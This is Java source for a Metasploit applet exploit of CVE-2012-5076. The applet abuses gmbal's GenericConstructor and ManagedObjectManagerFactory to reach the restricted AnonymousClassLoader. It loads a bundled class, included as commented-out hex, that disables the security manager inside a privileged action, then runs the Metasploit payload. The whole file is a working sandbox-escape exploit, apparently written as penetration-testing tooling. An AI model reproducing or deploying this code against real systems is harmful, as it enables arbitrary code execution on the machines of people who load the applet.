metasploit-gs/external/source/exploits/cve-2012-5076/Exploit.java

import java.applet.Applet;
import java.io.PrintStream;
import java.io.Serializable;
import java.lang.reflect.Method;
import com.sun.org.glassfish.gmbal.ManagedObjectManagerFactory;
import com.sun.org.glassfish.gmbal.util.GenericConstructor;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import metasploit.Payload;
//import java.lang.Runtime;

public class Exploit extends Applet
{

    public Exploit()
    {
    }
    
	public byte[] hex2Byte(String str)
    {
       byte[] bytes = new byte[str.length() / 2];
       for (int i = 0; i < bytes.length; i++)
       {
          bytes[i] = (byte) Integer
                .parseInt(str.substring(2 * i, 2 * i + 2), 16);
       }
       return bytes;
    }
    

    public void init()
    {
        try
        {
			// Hex String for MyPayload.class
            //String my_payload = "cafebabe0000003300350a000a001a0a001b001c07001d0a0003001e0a001f002009001f00210800220a002300240700250700260700270100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c6501000d537461636b4d61705461626c6507002507001d01000372756e01001428294c6a6176612f6c616e672f4f626a6563743b01000a457863657074696f6e730700280100017201000a536f7572636546696c6501000e4d795061796c6f61642e6a6176610c000c000d0700290c002a002b0100276a6176612f73656375726974792f50726976696c65676564416374696f6e457863657074696f6e0c002c000d07002d0c002e002f0c0030003101000668656c6c6f210700320c003300340100094d795061796c6f61640100106a6176612f6c616e672f4f626a6563740100276a6176612f73656375726974792f50726976696c65676564457863657074696f6e416374696f6e0100136a6176612f6c616e672f457863657074696f6e01001e6a6176612f73656375726974792f416363657373436f6e74726f6c6c657201000c646f50726976696c6567656401003d284c6a6176612f73656375726974792f50726976696c65676564457863657074696f6e416374696f6e3b294c6a6176612f6c616e672f4f626a6563743b01000f7072696e74537461636b54726163650100106a6176612f6c616e672f53797374656d01001273657453656375726974794d616e6167657201001e284c6a6176612f6c616e672f53656375726974794d616e616765723b29560100036f75740100154c6a6176612f696f2f5072696e7453747265616d3b0100136a6176612f696f2f5072696e7453747265616d0100077072696e746c6e010015284c6a6176612f6c616e672f537472696e673b295600210009000a0001000b000000030001000c000d0001000e0000005c00010002000000122ab700012ab8000257a700084c2bb60004b1000100040009000c00030002000f0000001a0006000000080004000b00090010000c000d000d000f001100110010000000100002ff000c00010700110001070012040001001300140002000e00000022000100010000000601b8000501b000000001000f0000000a000200000016000400170015000000040001001600090017000d0002000e000000250002000000000009b200061207b60008b100000001000f0000000a00020000001d0008001e0015000000040001001600010018000000020019";            
			//byte[] byte_payload = hex2Byte(my_payload);
			ByteArrayOutputStream bos = new ByteArrayOutputStream();
			byte[] buffer = new byte[8192];
			int length;

			// read in the class file from the jar
			InputStream is = getClass().getResourceAsStream("MyPayload.class");
			// and write it out to the byte array stream
			while( ( length = is.read( buffer ) ) > 0 )
				bos.write( buffer, 0, length );
			// convert it to a simple byte array
			buffer = bos.toByteArray();			
			
            GenericConstructor genericconstructor = new GenericConstructor(Object.class, "sun.invoke.anon.AnonymousClassLoader", new Class[0]);
            Object obj = genericconstructor.create(new Object[] {});                        
			Method method = ManagedObjectManagerFactory.getMethod(obj.getClass(), "loadClass", new Class[] { byte[].class });
            Class class1 = (Class)method.invoke(obj, new Object[] {
                //byte_payload
                buffer
            });
            class1.newInstance();
            //System.out.println("SecurityManager:" + System.getSecurityManager());
            //class1.getMethod("r", new Class[0]).invoke(class1, new Object[0]);
            Payload.main(null);
            //Runtime.getRuntime().exec("calc.exe");
        }
        catch(Exception exception)
        {
            //exception.printStackTrace();
        }
    }

}